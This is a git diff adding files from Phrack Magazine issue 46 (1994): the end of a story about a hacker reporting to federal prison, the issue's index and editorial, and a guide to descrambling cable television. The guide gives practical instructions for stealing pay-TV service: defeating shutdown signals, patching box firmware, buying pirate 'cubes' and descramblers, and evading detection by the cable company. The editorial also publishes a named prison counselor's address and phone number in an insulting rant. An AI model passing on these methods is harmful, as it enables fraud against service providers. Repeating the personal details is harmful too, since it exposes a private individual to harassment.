+ the blame.) We wound up watching the "Holy Grail" videotape until
+ it was practically light again. One of the last things I remember
+ was hearing Mark say how he wanted to sleep as little as possible
+ so he could be awake and free longer.
+
+ We left Bernie's late Saturday afternoon. It was sad because the
+ aura had been so positive and now it was definitely ending. We were
+ leaving the warmth of a house with a fireplace and a conversation
+ pit, journeying into the wild and the darkness with wind chill
+ factors well below zero. And this time, we weren't coming back.
+
+ We took two cars - Bernie and Rob in one; me, Mark, Walter, and
+ Roman in the other. We kept in touch with two way radios which was
+ a very good idea considering the number of wrong turns we always
+ manage to make. We passed through darkened towns and alien
+ landscapes, keeping track of the number of places left to go
+ through. We found a convenience store that had six foot tall beef
+ jerky and Camel Light Wides. Since Mark smokes Camel Lights (he had
+ managed to quit but all of the stress of the past year has gotten
+ him right back into it), and since he had never heard of the wide
+ version, I figured he'd like to compare the two, so I bought him a
+ pack. I never buy cigarettes for anyone because I can't stand them
+ and I think they're death sticks but in this case I knew they'd be
+ therapeutic. As we stood out there in the single digits - him with
+ his Wides, me with my iced tea - he said he could definitely feel
+ more smoke per inch. And, for some reason, I was glad to hear it.
+
+ Minersville was our final destination but we had one more town to
+ pass through - Frackville. Yeah, no shit. It was the final dose of
+ that magical karma we needed. As we looked down the streets of this
+ tiny town, we tried to find a sign that maybe we could take a
+ picture of, since nobody would ever believe us. We pulled up to a
+ convenience store as two cops were going in. And that's when we
+ realized what we had been sent there to do.
+
+ Bernie S. went in to talk to the cops and when he came out, he had
+ convinced them to pose with Mark in front of their squad car. (It
+ didn't really take much convincing - they were amazed that anyone
+ would care.) So, if the pictures come out, you can expect to see a
+ shot of Phiber Optik being "arrested" by the Frackville police, all
+ with big smiles on their faces. Frackville, incidentally, has a
+ population of about 5,000 which I'm told is about the distribution
+ of Phrack Magazine. Kinda cosmic.
+
+ So now there was nothing left to do. We couldn't even get lost -
+ the prison was straight ahead of us. Our long journey was about to
+ come to a close. But it had been incredible from the start; there
+ was no reason to believe the magic would end here. The prison
+ people would be friendly, maybe we'd chat with them for a while.
+ They'd make hot chocolate. All right, maybe not. But everybody
+ would part on good terms. We'd all give Mark a hug. Our sadness
+ would be countered by hope.
+
+ The compound was huge and brightly lit. We drove through it for
+ miles before reaching the administration building. We assumed this
+ was where Mark should check in so we parked the cars there and took
+ a couple of final videos from our camcorder. Mark was nervous but
+ he was still Mark. "I think the message is 'come here in the
+ summer,'" he said to the camera as we shivered uncontrollably in
+ the biting freeze.
+
+ As we got to the door of the administration building, we found it
+ to be locked. We started looking for side doors or any other way to
+ get in. "There's not a record of people breaking *into* prison,"
+ Bernie wondered out loud. It was still more craziness. Could they
+ actually be closed?
+
+ I drove down the road to another building and a dead end. Bernie
+ called the prison from his cellular phone. He told them he was in
+ front of the administration building and he wanted to check
+ somebody in. They were very confused and said there was no way he
+ could be there. He insisted he was and told them he was in his car.
+ "You have a *car* phone?" they asked in amazement. When the dust
+ settled, they said to come down to the building at the end of the
+ road where I was already parked. We waited around for a couple of
+ minutes until we saw some movement inside. Then we all got out and
+ started the final steps of our trip.
+
+ I was the first one to get to the door. A middle-aged bespectacled
+ guy was there. I said hi to him but he said nothing and fixed his
+ gaze on the five other people behind me.
+
+ "All right, who's from the immediate family?"
+
+ "None of us are immediate family. We're just--"
+
+ "Who's the individual reporting in?"
+
+ "I'm the individual reporting in," Mark said quietly.
+
+ "The only one I need is just him."
+
+ The guard asked Mark if he had anything on him worth more than
+ $100. Mark said he didn't. The guard turned to us.
+
+ "All right, gentlemen. He's ours. Y'all can depart."
+
+ They pulled him inside and he was gone. No time for goodbyes from
+ any of us - it happened that fast. It wasn't supposed to have been
+ like this; there was so much to convey in those final moments.
+ Mark, we're with you... Hang in there... We'll come and visit....
+ Just a fucking goodbye for God's sake.
+
+ It caught us all totally off guard. They were treating him like a
+ maximum security inmate. And they treated us like we were nothing,
+ like we hadn't been through this whole thing together, like we
+ hadn't just embarked on this crazy adventure for the last few days.
+ The karma was gone.
+
+ From behind the door, a hooded figure appeared holding handcuffs.
+ He looked through the glass at us as we were turning to leave.
+ Suddenly, he opened the outer door and pointed to our camera. "You
+ can't be videotaping the prison here," he said. "All right," I
+ replied, being the closest one to him and the last to start back to
+ the cars. As I turned away, he came forward and said, "We gotta
+ have that film." "But we didn't take any pictures of the prison!"
+ I objected. "We gotta take it anyway," he insisted.
+
+ We all knew what to do. Giving up the tape would mean losing all
+ recordings of Mark's last days of freedom. The meeting in
+ Philadelphia, slipping down the icy streets, hanging out in
+ Bernie's house, Frackville.... No way. No fucking way.
+
+ Roman, who had been our cameraman throughout, carefully passed off
+ the camera to Bernie, who quickly got to the front of the group. I
+ stayed behind to continue insisting that we hadn't filmed any part
+ of their precious prison. I didn't even get into the fact that
+ there are no signs up anywhere saying this and that it appeared to
+ me that he was imposing this rule just to be a prick. Not that I
+ would have, since Mark was somewhere inside that building and
+ anything we did could have repercussions for him. Fortunately, the
+ hooded guard appeared to conclude that even if he was able to grab
+ our camera, he'd probably never find the tape. And he never would
+ have.
+
+ The hooded guard stepped back inside and we went on our way. If it
+ had been dark and cold before, now it was especially so. And we all
+ felt the emptiness that had replaced Mark, who had been an active
+ part of our conversations only a couple of minutes earlier. We
+ fully expected to be stopped or chased at any moment for the
+ "trouble" we had caused. It was a long ride out of the compound.
+
+ We headed for the nearest major town:  Pottsville. There, we went to
+ the only 24 hour anything in miles, a breakfast/burger joint called
+ Coney Island of all things. We just kind of sat there for awhile,
+ not really knowing what to say and feeling like real solid shit.
+ Roman took out the camcorder and started looking through the view
+ screen. "We got it," he said. "We got it all."
+
+ Looking at the tape, the things that really hit me hard are the
+ happy things. Seeing the cops of Frackville posing and laughing
+ with Mark, only a few minutes before that ugly episode, puts a
+ feeling of lead in my stomach. I'm just glad we gave him a hell of
+ a sendoff; memories of it will give him strength to get through
+ this.
+
+ What sticks with me the most is the way Mark never changed, right
+ up to the end. He kept his incredible sense of humor, his caustic
+ wit, his curiosity and sense of adventure. And he never stopped
+ being a hacker in the true sense. What would a year of this
+ environment do to such a person?
+
+ Our long ride back to New York was pretty quiet for the most part.
+ Occasionally we'd talk about what happened and then we'd be alone
+ with our thoughts. My thoughts are disturbing. I know what I saw
+ was wrong. I know one day we'll realize this was a horrible thing
+ to do to somebody in the prime of life. I don't doubt any of that.
+ What I worry about is what the cost will be. What will happen to
+ these bright, enthusiastic, and courageous people I've come to know
+ and love? How many of us will give up and become embittered shells
+ of the full individuals we started out as? Already, I've caught
+ myself muttering aloud several times, something new for me.
+
+ Mark was not the only one, not by far. But he was a symbol - even
+ the judge told him that at the sentencing. And a message was sent,
+ as our system of justice is so fond of doing. But this time another
+ message was sent - this one from Mark, his friends, and the scores
+ of other hackers who spoke up. Everybody knew this wasn't right.
+ All through this emotional sinkhole, our tears come from sadness
+ and from anger. And, to quote the Clash, "Anger can be power." Now
+ we just have to learn to use it.
+
+        Mark Abene #32109-054
+        FPC, Schuylkill
+        Unit 1
+        PO Box 670
+        Minersville, PA 17954-0670
+
+[Letters, paperback books, and photos are acceptable. Virtually
+ nothing else is. And remember that everything will be looked at
+ by prison people first.]
diff --git a/phrack46/1.txt b/phrack46/1.txt
new file mode 100644
index 0000000..a8ccb28
--- /dev/null
+++ b/phrack46/1.txt
@@ -0,0 +1,363 @@
+                              ==Phrack Magazine==
+
+                   Volume Five, Issue Forty-Six, File 1 of 28
+
+                                 Issue 46 Index
+                              ___________________
+
+                               P H R A C K   4 6
+
+                               September 20, 1994
+                              ___________________
+
+                        "La cotorra que chi, no canta"
+
+Honey, I'm home!  Anyway, like the little proverb above indicates, I've
+been a very busy man since the last issue.  I've been denied entry to
+a federal prison in North Carolina (imagine the irony of THAT); I've
+been whoring in the Red-Light District of Amsterdam with military
+intelligence officers from England, Spain and the US; estuve chicaito en
+Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
+on TV a few more times.  (No, nimrod, Phrack is not my job...I WORK
+for a living.)
+
+Needless to say, it has been a chore for me to get Phrack out at all,
+much less only a month or so past my self-imposed quarterly deadline.
+But hell, I love doing this magazine, so here it is.  Phrack is the only
+way I can completely thrill and simultaneously piss off so many people
+at once, so I don't think I'll stop any time soon.
+
+Pissing people off.  It's what I like to do, and it would appear that
+I'm quite good at it.  I realize that there are several extremely
+vocal erikb-bashers out there.  And to them I say, "smooches!"
+Let's face it, sour grapes make bad whiners.  But hey, "As long as they're
+talking about Erikb, let 'em talk."  (Sorry Mr. Ford)
+
+Besides piecing together this issue, I've been working on getting
+the WWW pages together.  They still aren't 100%, but they are getting
+there.  By the time I finally get them together, the Phrack
+Web Site should be the ultimate underground resource on the net.
+Check it out:  http://freeside.com/phrack.html
+
+You may be interested in the federal prison remark from the first
+paragraph.  I had a meeting at IBM out in Research Triangle Park.  I
+figured that this would be an ideal time to go see Co/Dec who still has
+several years of federal time left to serve.  Co/Dec is in
+the Federal Correctional Institute at Butner, North Carolina, a short
+30 or so minutes from where I was staying in RTP.
+
+Anyway, I receive the necessary forms from Co/Dec to get on the approved
+visitors list, and sent them back in.  After several weeks, Co/Dec said
+that I still had not been added.  My trip was slated for a week away, so
+I called his counselor, Wilbert LeMay.  Mr. LeMay told me that he never got
+my forms.  I then fed-ex'ed a copy (that I luckily had kept).  It arrived
+on Friday morning, and I was to arrive on Monday.  Mr. LeMay had assured me
+that it would be no problem to get me added to Co/Dec's list.
+
+When I arrived on Monday, I called the prison to make sure the visit had
+been cleared.  Mr. LeMay would not return my calls.  In fact, not only
+would he not return any of the 5 or so calls I made, but he didn't even
+bother to enter my name on the visitor list until the Wednesday after I
+had already left North Carolina.
+
+I'm sorry, but this man must be a real prick.
+
+A bit of background on LeMay.  First off, according to those on the inside,
+LeMay dislikes white people.  He supposedly keeps a picture of slaves
+picking cotton on his desk as a constant reminder of the oppression his
+people were subjected to.  But perhaps working in the prison system where
+you have constant view of the Aryan Brotherhood in action, I'm sure many
+would begin to feel likewise.  (Can't we all just get along?)  Secondly,
+LeMay dislikes Co/Dec.  He put Co/Dec in solitary confinement for weeks
+because Co/Dec had a DOS MANUAL!  A fucking DOS MANUAL!  You do not
+put someone in the fucking hole for brushing up on the syntax for xcopy!
+You put them in the hole for inciting a fucking shank war, or for stealing
+food, or for punching a guard.  Later, Co/Dec found himself in solitary
+confinement AGAIN because he traded some smokes for telephone parts he was
+going to use to fix a radio.  The hole again.  Not for weapons and drugs,
+NO!  Much worse:  wires and a speaker!
+
+The prison now considers Co/Dec a security risk, and read all OUTGOING
+mail he sends.  Not just the regular reading of all incoming mail
+that any inmate would expect.  He can't take any clases, he's had
+several more days added to his sentence for "bad time served,"
+and in addition, all of his phone calls are live monitored and recorded.
+(A funny note, during one conversation I found that my touchtones would
+control the equipment they were using to record the call.  The equipment
+they were using was improperly connected and gave off a terrible hum
+when activated.  I kept turning off the recording, and the security
+officer kept having to turn it back on.)
+
+All of this, due to Counselor Wilbert LeMay.  Thanks guy.
+
+If someone can so grossly abuse their power to completely remove the
+dignity of another human being, inmate or otherwise, that person needs
+to face severe disciplinary action.  I'm writing the warden.  Directory
+Assistance says that Wilbert can be reached at:
+
+Wilbert LeMay
+701 East E St.
+Butner, NC 27509
+919-575-6375
+
+Fun fact:  Butner is serviced by GTE.
+
+You know, its pretty odd that as hackers, we probably know a larger number
+of ex-cons and current inmates than most people.
+
+But anyway, on to Phrack.
+
+This issue is pretty odd in that "The Man" has consented to write
+a few syllables for us to distribute.  Yes, Winn Schwartau submitted
+his unique perspectives of Defcon and HOPE.  It's funny how many people
+left Defcon this year and ran home to find information on HIRF weapons
+after hearing Winn speak.  (If you've actually built one by now, email
+me.)
+
+What else?  GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
+Conferences, and an incomplete university dialup list.  (Putting out
+an incomplete list really irritates me, but hell, its taking a LOT
+longer than I expected to get some 1300 dialups without more help.
+AHEM!)
+
+Can you dig it?  I knew that you could.
+
+-------------------------------------------------------------------------
+
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.  Cost is $100.00 US per user for
+subscription registration.  Cost of multi-user licenses will be
+negotiated on a site-by-site basis.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+Enclosed is  $________
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : Ice-9 (for helping me get this done!)
+             Rad Band : Green Day
+                 News : Datastream Cowboy
+          Photography : The Man
+    Prison Consultant : Co / Dec
+       The Young Girl : Jane March
+    Motor Trend's Car
+          of the Year : The 2600 Van
+Dickhead of the Month : Wilbert LeMay at FCI Butner
+            Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
+                        Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
+                        The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
+    Special Thanks To : Winn Schwartau
+
+Phrack Magazine V. 5, #46, September 20, 1994.     ISSN 1068-1035
+Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
+the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278              (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    freeside.com                     (Phrack FTP Site)
+                    /pub/phrack
+
+                    http://freeside.com/phrack.html  (Phrack WWW Home Page)
+
+                    phrack@well.sf.ca.us             (Phrack E-mail Address)
+                 or phrackmag on America Online
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
+
+Phrack goes out plaintext...you certainly can subscribe in plaintext.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+  -= Phrack 46 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1.  Introduction by The Editor                                   17 K
+ 2.  Phrack Loopback / Editorial                                  52 K
+ 3.  Line Noise                                                   61 K
+ 4.  Line Noise                                                   56 K
+ 5.  Phrack Prophile on Minor Threat                              12 K
+ 6.  Paid Advertisement                                           62 K
+ 7.  Paid Advertisement (cont)                                    45 K
+ 8.  The Wonderful World of Pagers by Erik Bloodaxe               24 K
+ 9.  Legal Info by Szechuan Death                                 13 K
+ 10. A Guide to Porno Boxes by Carl Corey                         13 K
+ 11. Unix Hacking - Tools of the Trade by The Shining             42 K
+ 12. The fingerd Trojan Horse by Hitman Italy                     32 K
+ 13. The Phrack University Dialup List                            12 K
+ 14. A Little About Dialcom by Herd Beast                         29 K
+ 15. VisaNet Operations Part I by Ice Jey                         50 K
+ 16. VisaNet Operations Part II by Ice Jey                        44 K
+ 17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam    25 K
+ 18. Startalk by The Red Skull                                    21 K
+ 19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau        45 K
+ 20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau       42 K
+ 21. The Groom Lake Desert Rat by PsychoSpy                       44 K
+ 22. HOPE by Erik Bloodaxe                                        51 K
+ 23. Cyber Christ Bites the Big Apple by Winn Schwartau           60 K
+ 24. The ABCs of Better Hotel Staying by Seven Up                 12 K
+ 25. AT&T Definity System 75/85 by Erudite                        13 K
+ 26. Keytrap v1.0 Keyboard Key Logger by Dcypher                  35 K
+ 27. International Scenes by Various Sources                      44 K
+ 28. Phrack World News by Datastream Cowboy                       38 K
+
+                                                    Total:       996 K
+
+_______________________________________________________________________________
+
+"Most hackers would have sold out their mother."
+         Justin Tanner Peterson
+
+"Treason is loved of many but the traitor hated of all."
+        Robert Greene (1552-1592)
+
+"They smile in your face, but all the while they want to take your place."
+        The O'Jays
diff --git a/phrack46/10.txt b/phrack46/10.txt
new file mode 100644
index 0000000..de4b53a
--- /dev/null
+++ b/phrack46/10.txt
@@ -0,0 +1,237 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 10 of 28
+
+****************************************************************************
+
+                   /**************************/
+                   /* A Guide to Porno Boxes */
+                   /*     by Carl Corey      */
+                   /**************************/
+
+
+Keeping with tradition, and seeing that this is the first article in
+Phrack on cable TV descrambling, any illegal box for use in descrambling
+cable television signals is now known as a PORNO BOX.
+
+There are many methods that cable companies use to insure that you get
+what you pay for - and _only_ what you pay for.  Of course, there are
+always methods to get 'more than you pay for'.  This file will discuss
+the most important aspects of these methods, with pointers to more
+detailed information, including schematics and resellers of equipment.
+
+
+Part I.  How the cable company keeps you from getting signals
+   A brief history
+
+---Older Systems---
+
+Most scrambling methods are, in theory, simple.  The original method
+used to block out signals was the trap method.  All traps remove signals
+that are sent from the CATV head end (the CATV company's station).  The
+first method, which is rarely used anymore was the negative trap.
+Basically, every point where the line was dropped had these traps, which
+removed the pay stations from your signal.  If you decided to add a pay
+station, the company would come out and remove the trap.  This method was
+pretty secure - you would provide physical evidence of tampering if you
+climbed the pole to remove them or alter them (sticking a pin through
+them seemed to work randomly, but could affect other channels, as it
+shifts the frequency the trap removes.)  This was a very secure system,
+but did not allow for PPV or other services, and required a lot of
+physical labor (pole-climbers aren't cheap).  The only places this is
+used anymore is in an old apartment building, as one trip can service
+several programming changes.  Look for a big gray box in the basement
+with a lot of coax going out.  If you are going to give yourself free
+service, give some random others free service to hide the trail.
+
+The next method used was termed a positive trap.  With this method, the
+cable company sends a _very_ strong signal above the real signal.  A
+tuner sees the strong signal, and locks onto the 'garbage' signal.  A
+loud beeping and static lines would show up on the set.  For the CATV
+company to enable a station, they put a 'positive' trap on the line,
+which (despite the name) removes the garbage signal.  Many text files
+have been around on how to descramble this method (overlooking the
+obvious, buying a (cheap) notch filter), ranging from making a crude
+variable trap, to adding wires to the cable signal randomly to remove the
+signal.  This system is hardly used anymore, as you could just put a trap
+inside your house, which wouldn't be noticed outside the house.
+
+---Current Systems---
+
+The next advent in technology was the box.  The discussion of different
+boxes follows, but there is one rather new technology which should be
+discussed with the traps.  The addressable trap is the CATV's dream.  It
+combines the best features of the negative trap (very difficult to tamper
+with without leaving evidence) with features of addressable boxes (no
+lineman needs to go out to add a service, computers can process Pay Per
+View or other services).  Basically, a 'smart trap' sits on the pole and
+removes signals at will.  Many systems require a small amp inside the
+house, which the cable company uses to make sure that you don't hook up
+more than one TV.  I believe that the new CATV act makes this illegal,
+and that a customer does not have to pay for any extra sets (which do not
+need equipment) in the house.  Of course, we all know that the cable TV
+company will do whatever it wants until it is threatened with lawsuits.
+
+Cable boxes use many different methods of descrambling.  Most are not in
+use anymore, with a few still around, and a few around the corner in the
+future.  The big thing to remember is sync suppression.  This method is
+how the cable companies make the picture look like a really fucked up,
+waving Dali painting.  Presently the most popular method is the Tri-mode
+In-band Sync suppression.  The sync signal is suppressed by 0, 6, or 10
+dB.  The sync can be changed randomly once per field, and the information
+necessary for the box to rebuild a sync signal.  This very common system
+is discussed in Radio-Electronics magazine in the 2/87 issue.  There are
+schematics and much more detailed theory than is provided here.
+
+The other common method currently used is SSAVI, which is most common on
+Zenith boxes.  It stands for Sync Suppression And Video Inversion.  In
+addition to sync suppression, it uses video inversion to also 'scramble'
+the video.  There is no sync signal transmitted separately (or reference
+signal to tell the box how to de-scramble) as the first 26 lines (blank,
+above the picture) are not de-synched, and can be re-synched with a
+phased lock loop - giving sync to the whole field.  The data on inversion
+is sent somewhere in the 20 or 21st line, which is outside of the
+screen.  Audio can be scrambled too, but it is actually just moved to a
+different frequency.  Radio Electronics August 92 on has circuits and
+other info in the Drawing Board column.
+
+---Future Systems-
+
+For Pioneer, the future is now.  The system the new Pioneers use is
+patented and Pioneer doesn't want you to know how it works.  From the
+patent, it appears to use combinations of in-band, out-band, and keys
+(also sending false keys) to scramble and relay info necessary to
+descramble.  These boxes are damn slick.  The relevant patents are US
+#5,113,411 and US #4,149,158 if you care to look.  There is not much
+information to be gained from them.  Look for future updates to this
+article with info on the system if I can find any :)
+
+Other systems are the VideoCipher + (used on satellites now - this is
+scary shit.)  It uses DES-encrypted audio.  DigiCable and DigiCipher are
+similar, with Digi encrypting the video with DES also  (yikes)...  And
+they all use changing keys and other methods.  Oak Sigma converters use
+similar methods which are available now on cable.  (digital encryption of
+audio, etc...)
+
+Part II.  How the cable company catches you getting those signals
+
+There are many methods the CATV company can use to catch you, or at
+least keep you from using certain methods.
+
+Market Code:   Almost _all_ addressable decoders now use a market code.
+                This is part of the serial number (which is used for pay
+                per view addressing) which decodes to a general geographic
+                region.  Most boxes contain code which tell it to shut
+                down if it receives a code (which can be going to any box
+                on the cable system) which is from a different market area.
+                So if you buy a converter that is say, market-coded for
+                Los Angeles, you won't be able to use it in New York.
+
+Bullets:        The bullet is a shut down code like above - it will make
+                your box say 'bAh' and die.  The method used most is for
+                the head end to send messages to every box they know of
+                saying 'ignore the next shutdown message' ... and once
+                every (legit) box has this info, it sends the bullet.
+                The only boxes that actually process the bullet are ones
+                which the CATV system doesn't know about.  P.S.  Don't
+                call the cable company and complain about cable if you
+                are using an illegal converter - and be sure to warn
+                anyone you live with about calling the CATV co. also.
+
+Leak Detection: The FCC forces all cable companies to drive around and
+                look for leaks - any poor splice jobs (wiring your house
+                from a neighbors without sealing it up nice) and some
+                descramblers will emit RF.  So while the CATV is looking
+                for the leaks, they may catch you.
+
+Free T-Shirts: The cable company can, with most boxes, tell the box to
+                display a different signal.  So they can tell every box
+                they know of (the legit box pool) to display a commercial
+                on another channel, while the pirate boxes get this real
+                cool ad with an 1800 number for free t-shirts... you call,
+                you get busted.  This is mostly done during PPV boxing or
+                other events which are paid for - as the company knows
+                exactly who should get that signal, and can catch even
+                legit boxes which are modified to receive the fight.
+
+Your Pals:      Programs like "Turn in a cable pirate and get $100" let
+                you know who your friends _really_ are.
+
+
+Part III:  How to get away with it.
+
+I get a lot of questions about opening a box that you own.  This is not
+a good idea.  Most, if not ALL boxes today have a tamper sensor.  If you
+open the box, you break a tab, flip a switch, etc...  This disables the
+box and leaves a nice piece of evidence for the CATV co. to show that you
+played with it.
+
+I also have had questions about the old "unplug the box when it is
+enabled, then plug it back in later"...  The CATV company periodically
+sends a signal to update all the boxes to where they should be.  If you
+want to do this, you'll need to find out where the CATV sends the address
+information, and then you need to trap it out of the signal.  So as soon
+as the fraudulent customer (let's call him Chris) sees his box get the
+signal to receive the PPV porn channel, he installs the trap and now his
+box will never get any pay per view signals again...  but he'll always
+have whatever he was viewing at the time he put the trap in.  Big problem
+here is that most _newer_ systems also tell the box how long it can
+descramble that channel - i.e.  "Watch SPICE until I tell you not to, or 3
+hours have passed"...
+
+Where to make/buy/get porno boxes:
+
+You can order a box which has been modified not to accept bullets.  This
+method is pretty expensive.  You can also get a 'pan' descrambler - it is
+a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
+descrambles it.  These boxes can't be killed by the bullets, and work
+pretty well.  There are some pans which are made by the same company as
+your cable box and are sensitive to bullets, so beware.
+
+There are two basic ideas for modifying a box (provided you get detailed
+instructions on how to get it open, or how to fix it once you open it).
+You can change the S/N to something which is known as 'universal' or
+disassemble the code and remove the jump to the shutdown code.
+The universal codes are rare, and may be extinct.  Besides, if the cable
+company finds out your code, they can nuke it.  This happens when someone
+who makes (err made) 'universal' chips gets busted.  The modification of
+the actual code is the best way to do it, just forcing a positive
+response to permission checks is the easiest way.
+
+A 'cube' is not a NeXT, it's a device which removes the data signal from
+the cable line, and inserts a 'nice' data signal which tells your box to
+turn everything on.  A 'destructive' cube actually re-programs all the
+boxes below it to a new serial number and gives that number full
+privileges, while a 'non-destructive' cube needs to know your boxes
+serial number, so it can tell your box (without modifications) that it
+can view everything.  You have to get a new IC if you change boxes, but
+the plus is that you can remove the cube and the box functions as
+normal.  Then again, you have to trust the place you are ordering the
+cube from to not be working for the cable company, as you have to give
+them your box serial number - which the CATV cable has in their records.
+Cubes have been seen for sale in the back of Electronics Now (formerly
+Radio Electronics).
+
+Of course, you could check in the above mentioned articles and build
+circuitry, it would be a lot cheaper.  The only problem is that you have
+to be good enough not to fuck it up - TV signals are very easy to fuck up.
+
+Then there is the HOLY GRAIL.  Most scrambling systems mess with the sync
+pulse.  This pulse is followed by the colorburst signal on NTSC video.
+Basically, the grail finds the colorburst and uses it as a reference
+signal.  In theory, it works wonderfully (but does not fix the video
+inversion problems found on SSAVI systems).  However, with the sync pulse
+whacked, the colorburst method may give weak color or color shifts.  The
+schematics are in the May 1990 Radio-Electronics.  I have also received
+email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
+a modified (supposedly higher quality) version of the R-E schematics.
+The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
+etched board.  A little steep, but not too bad.  E-mail the above for
+more information.
+
+
+Anyway, that's all for now.  Remember, information (including XXX movies)
+wants to be free!
+
+Carl Corey / dEs
+ 
diff --git a/phrack46/11.txt b/phrack46/11.txt
new file mode 100644
index 0000000..4fdfd5d
--- /dev/null
+++ b/phrack46/11.txt
@@ -0,0 +1,1504 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 11 of 28
+
+****************************************************************************
+
+
+                    ***********************************
+                    * Unix Hacking Tools of the Trade *
+                    *                                 *
+                    *                By               *
+                    *                                 *
+                    *  The Shining/UPi (UK Division)  *
+                    ***********************************
+
